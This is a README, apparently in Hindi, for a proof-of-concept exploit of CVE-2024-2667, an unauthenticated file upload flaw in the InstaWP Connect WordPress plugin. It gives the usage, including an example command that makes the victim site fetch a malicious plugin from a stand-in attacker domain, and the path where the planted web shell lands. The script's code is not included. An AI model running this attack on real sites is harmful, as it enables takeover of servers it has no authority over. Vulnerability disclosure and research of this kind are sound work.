
CVE-2024-2667 के लिए PoC एक्सप्लॉइट: InstaWP Connect WordPress प्लगइन REST API एंडपॉइंट में अपर्याप्त फ़ाइल सत्यापन के माध्यम से स्वचालित मनमाना फ़ाइल अपलोड और शेल एक्सेस।
WordPress के लिए InstaWP Connect – 1-click WP Staging & Migration प्लगइन, /wp-json/instawp-connect/v1/config REST API एंडपॉइंट में अपर्याप्त फ़ाइल सत्यापन के कारण 0.1.0.22 तक के सभी संस्करणों में मनमानी फ़ाइल अपलोड के प्रति संवेदनशील है। यह बिना प्रमाणीकरण वाले हमलावरों के लिए मनमानी फ़ाइलें अपलोड करना संभव बनाता है।
| विवरण | जानकारी | आइकन |
|---|
| आवश्यक लाइब्रेरी इंस्टॉल करें | आवश्यक Python लाइब्रेरी इंस्टॉल करने के लिए pip का उपयोग करें: requests और beautifulsoup4। | 🛠️ |
| इंस्टॉल करने का कमांड | चलाएँ: pip install requests beautifulsoup4। | 📥 |
| विवरण | जानकारी | आइकन |
|---|---|---|
| स्क्रिप्ट निष्पादित करें | आवश्यक तर्कों के साथ कमांड लाइन का उपयोग करके स्क्रिप्ट चलाएँ। | 🚀 |
| आवश्यक तर्क | - -up: प्लगइन URL (जैसे, http://attacker-domain/malicious-plugin.zip)। | |
- -u: लक्षित WordPress URL (जैसे, http://victim-domain/)। | 🔧 | |
| उदाहरण कमांड | python CVE-2024-2667.py -up http://attacker-domain/malicious-plugin.zip -u http://victim-domain/ | 📜 |
| विवरण | जानकारी | आइकन |
|---|---|---|
| संस्करण जाँच | स्क्रिप्ट लक्षित प्लगइन के संस्करण के लिए readme.txt फ़ाइल की जाँच करती है। | 🔍 |
| संवेदनशील संस्करण | यदि संस्करण <= 0.1.0.22 है, तो स्क्रिप्ट प्रिंट करती है: The site is vulnerable. | ⚠️ |
| सुरक्षित संस्करण | यदि संस्करण > 0.1.0.22 है, तो स्क्रिप्ट प्रिंट करती है: The site is not vulnerable. | ✅ |
| विवरण | जानकारी | आइकन |
|---|---|---|
| शेल पथ | यदि अपलोड सफल होता है, तो शेल यहाँ उपलब्ध होगा: | 🐚 |
wp-content/plugins/instawp-connect/shell.php. |
usage: CVE-2024-2667.py [-h] -up URL_PLUGIN -u URL_TARGET
The InstaWP Connect – 1-click WP Staging & Migration plugin for WordPress is vulnerable to arbitrary file uploads due
to insufficient file validation in the /wp-json/instawp-connect/v1/config REST API endpoint in all versions up to, and
including, 0.1.0.22. This makes it possible for unauthenticated attackers to upload arbitrary files.
options:
-h, --help show this help message and exit
-up URL_PLUGIN, --url_plugin URL_PLUGIN
URL of the plugin (e.g., http://attacker-domain/malicious-plugin.zip).
-u URL_TARGET, --url_target URL_TARGET
URL of the target WordPress site (e.g., http://victim-domain/).